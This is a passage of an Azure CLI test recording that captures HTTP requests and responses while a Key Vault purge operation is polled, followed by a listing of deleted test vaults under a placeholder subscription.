location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:22:38 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:22:44 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:22:49 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:22:55 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:00 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:06 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:12 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1NzIxODgzMzEzN3w5Njg1RkMzNTg3MzQ0MTlFQkU4N0U0QTkxNjlDODU3Nw?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:22:00Z","lastActionDateTime":"2020-03-23 10:23:15Z","status":"Succeeded"}' headers: cache-control: - no-cache content-length: - '107' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:17 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01 response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/northcentralus/deletedVaults/yugangwncu-kv","name":"yugangwncu-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangwncu/providers/Microsoft.KeyVault/vaults/yugangwncu-kv","location":"northcentralus","tags":{},"deletionDate":"2020-01-04T17:11:31Z","scheduledPurgeDate":"2020-04-03T17:11:31Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvaultjnsfjh6","name":"cmk-test-keyvaultjnsfjh6","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgni6glhhbkokgvg4iwzohowsc2smndkbz467a7hg26dvpc7sdanz3p5xhbpeyecbti/providers/Microsoft.KeyVault/vaults/cmk-test-keyvaultjnsfjh6","location":"eastus","tags":{},"deletionDate":"2020-03-20T18:06:34Z","scheduledPurgeDate":"2020-06-18T18:06:34Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvaultfsthqtt","name":"cmk-test-keyvaultfsthqtt","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rggdmpmbpy6ewfjuhaozsszfteklivu4jhnaiqszcrxh3onvrmv5ye6z6nx7lso3jsa/providers/Microsoft.KeyVault/vaults/cmk-test-keyvaultfsthqtt","location":"eastus","tags":{},"deletionDate":"2020-03-19T07:53:34Z","scheduledPurgeDate":"2020-06-17T07:53:34Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvaultfm6wjrk","name":"cmk-test-keyvaultfm6wjrk","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgwtx47ni5hkrbbmxddmqumh5mgmrcbrtcly2ukdtyhxtrbya2hjpw5kbreowxstb7u/providers/Microsoft.KeyVault/vaults/cmk-test-keyvaultfm6wjrk","location":"eastus","tags":{},"deletionDate":"2020-03-13T18:06:12Z","scheduledPurgeDate":"2020-06-11T18:06:12Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/jlkv0311","name":"jlkv0311","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/jlrg/providers/Microsoft.KeyVault/vaults/jlkv0311","location":"eastus","tags":{},"deletionDate":"2020-03-11T14:11:34Z","scheduledPurgeDate":"2020-03-23T14:11:34Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvault5sqfx2x","name":"cmk-test-keyvault5sqfx2x","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgmaeu767ym7nzvi3vj7xwbxxwidfk53lnm56h7zmeubkfbmpl4uwokt34w4hqdcl4n/providers/Microsoft.KeyVault/vaults/cmk-test-keyvault5sqfx2x","location":"eastus","tags":{},"deletionDate":"2020-03-06T18:14:23Z","scheduledPurgeDate":"2020-06-04T18:14:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westeurope/deletedVaults/kv-ssl-test22wtltn3c","name":"kv-ssl-test22wtltn3c","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgwikdo6eqepisjaezxd72ki4rvhirjaqy7tt2g7nb76i4vchoxxarcxcsna5kmw4cn/providers/Microsoft.KeyVault/vaults/kv-ssl-test22wtltn3c","location":"westeurope","tags":{},"deletionDate":"2020-03-20T18:10:08Z","scheduledPurgeDate":"2020-06-18T18:10:08Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westeurope/deletedVaults/kv-ssl-test4nzdhgcpc","name":"kv-ssl-test4nzdhgcpc","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgylrzgouyxoqbo46qlxquz2ibbb47efjjjzoyhyx56diin333y2bv4tnyzvdnhks5j/providers/Microsoft.KeyVault/vaults/kv-ssl-test4nzdhgcpc","location":"westeurope","tags":{},"deletionDate":"2020-03-19T07:58:01Z","scheduledPurgeDate":"2020-06-17T07:58:01Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westeurope/deletedVaults/kv-ssl-testahd35d2h7","name":"kv-ssl-testahd35d2h7","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgfi6unrzrgex22etdwxy5wixos3xp73m6q3ckrschl5e673yt2hbupuoel676kf6cf/providers/Microsoft.KeyVault/vaults/kv-ssl-testahd35d2h7","location":"westeurope","tags":{},"deletionDate":"2020-03-13T18:42:18Z","scheduledPurgeDate":"2020-06-11T18:42:18Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westeurope/deletedVaults/kv-ssl-testdgnzfntdg","name":"kv-ssl-testdgnzfntdg","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rggvpg6n5vl3zdrlrhd2pheycnoaakok5ggno66zmdqitni7hdbq3rbwcgspssihmmm/providers/Microsoft.KeyVault/vaults/kv-ssl-testdgnzfntdg","location":"westeurope","tags":{},"deletionDate":"2020-03-06T18:54:05Z","scheduledPurgeDate":"2020-06-04T18:54:05Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastasia/deletedVaults/xxj-jedi-1","name":"xxj-jedi-1","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/xiaojianxu/providers/Microsoft.KeyVault/vaults/xxj-jedi-1","location":"eastasia","tags":{},"deletionDate":"2020-03-06T15:27:15Z","scheduledPurgeDate":"2020-06-04T15:27:15Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southeastasia/deletedVaults/test-kv-kv","name":"test-kv-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/test/providers/Microsoft.KeyVault/vaults/test-kv-kv","location":"southeastasia","tags":{},"deletionDate":"2020-01-12T17:14:55Z","scheduledPurgeDate":"2020-04-11T17:14:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-ef7h5yc4i","name":"cli-test-kv-sd-ef7h5yc4i","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sd3sy6wwddyn7upf5kz7biac6otb42h5lukakt4f4zvdfwmm4tv3jeslq/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-ef7h5yc4i","location":"eastus2","tags":{},"deletionDate":"2020-03-21T14:45:20Z","scheduledPurgeDate":"2020-06-19T14:45:20Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-opq6hvmd5","name":"cli-test-kv-sd-opq6hvmd5","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sdg4wncg7apey6kkl45mgws5a5w2w72nxjsxdli5f5fyaf77nqstt5f7y/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-opq6hvmd5","location":"eastus2","tags":{},"deletionDate":"2020-03-10T13:29:53Z","scheduledPurgeDate":"2020-06-08T13:29:53Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-sg2xy2ttq","name":"cli-test-kv-sd-sg2xy2ttq","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sd4ed2sssomniuokdoozvpwowez2cn3ysq62iz5qbll24fs63xvrhkbo6/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-sg2xy2ttq","location":"eastus2","tags":{},"deletionDate":"2020-03-10T13:18:34Z","scheduledPurgeDate":"2020-06-08T13:18:34Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-unajpf66i","name":"cli-test-kv-sd-unajpf66i","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sdtaj3w3eefnjm4o5twxj5xf3zlqjgofooerqpavl7lfmdfivm3c72zyk/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-unajpf66i","location":"eastus2","tags":{},"deletionDate":"2020-03-10T12:57:56Z","scheduledPurgeDate":"2020-06-08T12:57:56Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-vprnoufc7","name":"cli-test-kv-sd-vprnoufc7","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sdcscjau5ojn3wrsihkgo5qkppsib4st3u7oj2l3fu5sspzhlxhls3jre/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-vprnoufc7","location":"eastus2","tags":{},"deletionDate":"2020-03-10T12:48:26Z","scheduledPurgeDate":"2020-06-08T12:48:26Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centralus/deletedVaults/ygpl123-kv","name":"ygpl123-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ygpl123/providers/Microsoft.KeyVault/vaults/ygpl123-kv","location":"centralus","tags":{},"deletionDate":"2020-01-29T17:11:24Z","scheduledPurgeDate":"2020-04-28T17:11:24Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centralus/deletedVaults/yg77778-kv","name":"yg77778-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yg77778/providers/Microsoft.KeyVault/vaults/yg77778-kv","location":"centralus","tags":{},"deletionDate":"2020-01-28T17:11:25Z","scheduledPurgeDate":"2020-04-27T17:11:25Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centralus/deletedVaults/testcmdportal2-kv","name":"testcmdportal2-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/testcmdportal2/providers/Microsoft.KeyVault/vaults/testcmdportal2-kv","location":"centralus","tags":{},"deletionDate":"2020-01-26T17:11:23Z","scheduledPurgeDate":"2020-04-25T17:11:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centralus/deletedVaults/testcmdportal-kv","name":"testcmdportal-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/testcmdportal/providers/Microsoft.KeyVault/vaults/testcmdportal-kv","location":"centralus","tags":{},"deletionDate":"2020-01-26T17:11:23Z","scheduledPurgeDate":"2020-04-25T17:11:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitestf6lq7ziokqh3dkpsg","name":"clitestf6lq7ziokqh3dkpsg","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rg2mhmykqhsgxq7knbacrxrfbiir4dfmsyz5mbjtwfuecpjg4loqxmtl3rwvot2mr2r/providers/Microsoft.KeyVault/vaults/clitestf6lq7ziokqh3dkpsg","location":"southcentralus","tags":{},"deletionDate":"2020-03-20T18:25:05Z","scheduledPurgeDate":"2020-06-18T18:25:05Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitest3zvxu4rsr6tqumcsy","name":"clitest3zvxu4rsr6tqumcsy","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgtj3rssqbhzbatcnt3twclix7b52rdvnfwmrcwsiusvh3ixk2dlttbwnbjkh4hkl2o/providers/Microsoft.KeyVault/vaults/clitest3zvxu4rsr6tqumcsy","location":"southcentralus","tags":{},"deletionDate":"2020-03-19T08:12:57Z","scheduledPurgeDate":"2020-06-17T08:12:57Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitest42h57eiz6tts7wv2o","name":"clitest42h57eiz6tts7wv2o","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgody7efo5s76evefykui2msh64z65vkb2xzjli46qlkyp5pze6kjmemsloeb5zq5zx/providers/Microsoft.KeyVault/vaults/clitest42h57eiz6tts7wv2o","location":"southcentralus","tags":{},"deletionDate":"2020-03-13T18:33:21Z","scheduledPurgeDate":"2020-06-11T18:33:21Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitesttwwerfe7vawtehhji","name":"clitesttwwerfe7vawtehhji","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgfrygla3nlekzul3b5sn4aqa2l2yk47nhnrprl6a6d2x26kgpoy2leixtkopl25pwq/providers/Microsoft.KeyVault/vaults/clitesttwwerfe7vawtehhji","location":"southcentralus","tags":{},"deletionDate":"2020-03-06T18:52:59Z","scheduledPurgeDate":"2020-06-04T18:52:59Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/ygcmkkv","name":"ygcmkkv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ygcmk/providers/Microsoft.KeyVault/vaults/ygcmkkv","location":"southcentralus","tags":{},"deletionDate":"2020-03-06T14:11:15Z","scheduledPurgeDate":"2020-06-04T14:11:15Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-xe3nrma","name":"cli-test-kv-mgmt-xe3nrma","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt3brblwljugzseunt26lvrdx2zoqhsdhlhm4rhzlrksiznpg63kglv/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-xe3nrma","location":"westus","tags":{},"deletionDate":"2020-03-23T07:45:41Z","scheduledPurgeDate":"2020-06-21T07:45:41Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-slpaykn","name":"cli-test-kv-mgmt-slpaykn","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtnpnuy6uncav5scer37yb4xpwe524zlmzqmwtktdf7j76hyj472qk5/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-slpaykn","location":"westus","tags":{},"deletionDate":"2020-03-22T05:33:55Z","scheduledPurgeDate":"2020-06-20T05:33:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-4bafqr","name":"cli-test-kv-se-sd-4bafqr","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deletexsey